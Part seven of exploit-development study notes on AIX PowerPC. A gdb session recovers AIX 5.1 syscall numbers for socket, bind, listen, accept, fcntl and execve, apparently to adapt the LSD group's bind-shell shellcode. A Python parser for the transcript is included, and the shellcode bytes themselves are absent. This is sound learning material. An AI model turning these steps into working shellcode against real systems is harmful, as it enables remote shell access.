AIX PowerPC Architecture and Overflow Techniques: Study Notes (7)

2019-03-23 13:04

(gdb)
0x1000735c in socket ()
(gdb) p/x $r2
$1 = 0x8d
(gdb) c
Continuing.

Breakpoint 2, 0x10007448 in bind ()
(gdb) x/8i $pc
0x10007448 : lwz r12,32(r2)
0x1000744c : stw r2,20(r1)
0x10007450 : lwz r0,0(r12)
0x10007454 : lwz r2,4(r12)
0x10007458 : mtctr r0
0x1000745c : bctr
0x10007460 : .long 0x0
0x10007464 : .long 0xc8000
(gdb) si
0x1000744c in bind ()
(gdb)
0x10007450 in bind ()
(gdb)
0x10007454 in bind ()
(gdb)
0x10007458 in bind ()
(gdb) p/x $r2
$2 = 0x8c
(gdb) c
Continuing.

Breakpoint 3, 0x1000746c in listen ()
(gdb) x/8i $pc
0x1000746c : lwz r12,36(r2)
0x10007470 : stw r2,20(r1)
0x10007474 : lwz r0,0(r12)
0x10007478 : lwz r2,4(r12)
0x1000747c : mtctr r0
0x10007480 : bctr
0x10007484 : .long 0x0
0x10007488 : .long 0xc8000
(gdb) si
0x10007470 in listen ()
(gdb)
0x10007474 in listen ()
(gdb)
0x10007478 in listen ()
(gdb)
0x1000747c in listen ()
(gdb) p/x $r2
$5 = 0x8b
(gdb) c
Continuing.

Breakpoint 4, 0x10007394 in naccept ()
(gdb) x/8i $pc
0x10007394 : lwz r12,12(r2)
0x10007398 : stw r2,20(r1)
0x1000739c : lwz r0,0(r12)
0x100073a0 : lwz r2,4(r12)
0x100073a4 : mtctr r0
0x100073a8 : bctr
0x100073ac : .long 0x0
0x100073b0 : .long 0xc8000
(gdb) si
0x10007398 in naccept ()
(gdb)
0x1000739c in naccept ()
(gdb)
0x100073a0 in naccept ()
(gdb)
0x100073a4 in naccept ()
(gdb) p/x $r2
$6 = 0x8a
(gdb) c
Continuing.

Breakpoint 5, 0x100074b4 in close ()
(gdb) x/8i $pc
0x100074b4 : lwz r12,44(r2)
0x100074b8 : stw r2,20(r1)
0x100074bc : lwz r0,0(r12)
0x100074c0 : lwz r2,4(r12)
0x100074c4 : mtctr r0
0x100074c8 : bctr
0x100074cc : .long 0x0
0x100074d0 : .long 0xc8000
(gdb) si
0x100074b8 in close ()
(gdb)
0x100074bc in close ()
(gdb)
0x100074c0 in close ()
(gdb)
0x100074c4 in close ()
(gdb) p/x $r2
$7 = 0xa0
(gdb) c
Continuing.

Breakpoint 6, 0x100074d8 in kfcntl ()
(gdb) x/8i $pc
0x100074d8 : lwz r12,48(r2)
0x100074dc : stw r2,20(r1)
0x100074e0 : lwz r0,0(r12)
0x100074e4 : lwz r2,4(r12)
0x100074e8 : mtctr r0
0x100074ec : bctr
0x100074f0 : .long 0x0
0x100074f4 : .long 0xc8000
(gdb) si
0x100074dc in kfcntl ()
(gdb)
0x100074e0 in kfcntl ()
(gdb)
0x100074e4 in kfcntl ()
(gdb)
0x100074e8 in kfcntl ()
(gdb) p/x $r2
$1 = 0x142
(gdb) c
Continuing.

Breakpoint 7, 0x10007328 in execve ()
(gdb) x/8i $pc
0x10007328 : lwz r12,0(r2)
0x1000732c : stw r2,20(r1)
0x10007330 : lwz r0,0(r12)
0x10007334 : lwz r2,4(r12)
0x10007338 : mtctr r0
0x1000733c : bctr
0x10007340 : .long 0x0
0x10007344 : .long 0xc8000
(gdb) si
0x1000732c in execve ()
(gdb)
0x10007330 in execve ()
(gdb)
0x10007334 in execve ()
(gdb)
0x10007338 in execve ()
(gdb) p/x $r2
$9 = 0x5

Good. Each libc stub loads a function descriptor from the TOC (r2), puts the entry address in r0 and the system call number in r2 before the bctr, so the value of r2 at the mtctr is the number we want. We have now found the system call numbers we need on AIX 5.1:

socket=0x8d bind=0x8c listen=0x8b naccept=0x8a close=0xa0 kfcntl=0x142 execve=0x05
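As an added example (not part of the original note and not lsd's code), the following Python parser reads a captured gdb transcript in the shape shown above, confirms that each stub has the AIX TOC/function-descriptor shape (lwz r12,off(r2) ... lwz r0,0(r12); lwz r2,4(r12); mtctr r0; bctr) and collects the function-to-syscall-number table from the p/x $r2 output. The embedded transcript excerpt is constructed from the bind and listen stubs above.

```python
import re

# Constructed excerpt in the shape of the gdb session above (not a live session).
TRANSCRIPT = """\
Breakpoint 2, 0x10007448 in bind ()
(gdb) x/8i $pc
0x10007448 : lwz r12,32(r2)
0x1000744c : stw r2,20(r1)
0x10007450 : lwz r0,0(r12)
0x10007454 : lwz r2,4(r12)
0x10007458 : mtctr r0
0x1000745c : bctr
(gdb) p/x $r2
$2 = 0x8c
Breakpoint 3, 0x1000746c in listen ()
(gdb) x/8i $pc
0x1000746c : lwz r12,36(r2)
0x10007470 : stw r2,20(r1)
0x10007474 : lwz r0,0(r12)
0x10007478 : lwz r2,4(r12)
0x1000747c : mtctr r0
0x10007480 : bctr
(gdb) p/x $r2
$5 = 0x8b
"""

BP_RE = re.compile(r"^Breakpoint \d+, 0x[0-9a-f]+ in (\w+) \(\)")
INSN_RE = re.compile(r"^0x[0-9a-f]+ : (\S+)\s*(.*)$")
VAL_RE = re.compile(r"^\$\d+ = (0x[0-9a-f]+)")
# Tail of the AIX libc syscall stub: descriptor -> r0 = entry, r2 = syscall number.
STUB_TAIL = ["lwz r0,0(r12)", "lwz r2,4(r12)", "mtctr r0", "bctr"]

def parse_syscall_table(text):
    """Return {function: {"toc_offset": int|None, "syscall": int|None}}."""
    table, func, insns = {}, None, []
    for line in text.splitlines():
        if m := BP_RE.match(line):  # a new stub: remember its name
            func, insns = m.group(1), []
            table[func] = {"toc_offset": None, "syscall": None}
        elif (m := INSN_RE.match(line)) and func:
            insns.append(f"{m.group(1)} {m.group(2)}".strip())
            # at the bctr, confirm the TOC/descriptor shape and keep the TOC offset
            if insns[-1] == "bctr" and insns[-4:] == STUB_TAIL:
                off = re.match(r"lwz r12,(\d+)\(r2\)", insns[0])
                table[func]["toc_offset"] = int(off.group(1)) if off else None
        elif (m := VAL_RE.match(line)) and func:  # output of p/x $r2 at the mtctr
            table[func]["syscall"] = int(m.group(1), 16)
    return table

if __name__ == "__main__":
    print(parse_syscall_table(TRANSCRIPT))
```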

lsd has already implemented all of this functionality; we only need to make a few small changes:

char lsd[] =
    /* shellcode byte string not preserved in this copy */
    /* listen=0x8b naccept=0x8a */ /* kfcntl=0x142 */

